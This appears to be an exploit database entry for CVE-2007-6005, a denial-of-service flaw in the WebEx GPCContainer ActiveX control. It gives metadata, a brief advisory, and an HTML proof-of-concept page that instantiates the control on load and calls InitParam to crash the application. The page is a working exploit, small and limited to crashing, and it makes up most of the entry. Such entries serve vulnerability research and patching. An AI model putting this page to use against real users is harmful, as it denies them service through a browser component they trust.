WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities

Author: Elazar Broad
type: dos
platform: windows
port: 
date_added: 2007-11-13  
date_updated: 2014-01-06  
verified: 1  
codes: CVE-2007-6005;OSVDB-45294  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30761.html  

source: https://www.securityfocus.com/bid/26430/info

WebEx is prone to multiple remote denial-of-service vulnerabilities.

Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users.

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

        obj.InitParam("A");
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();">

 </body>

</html>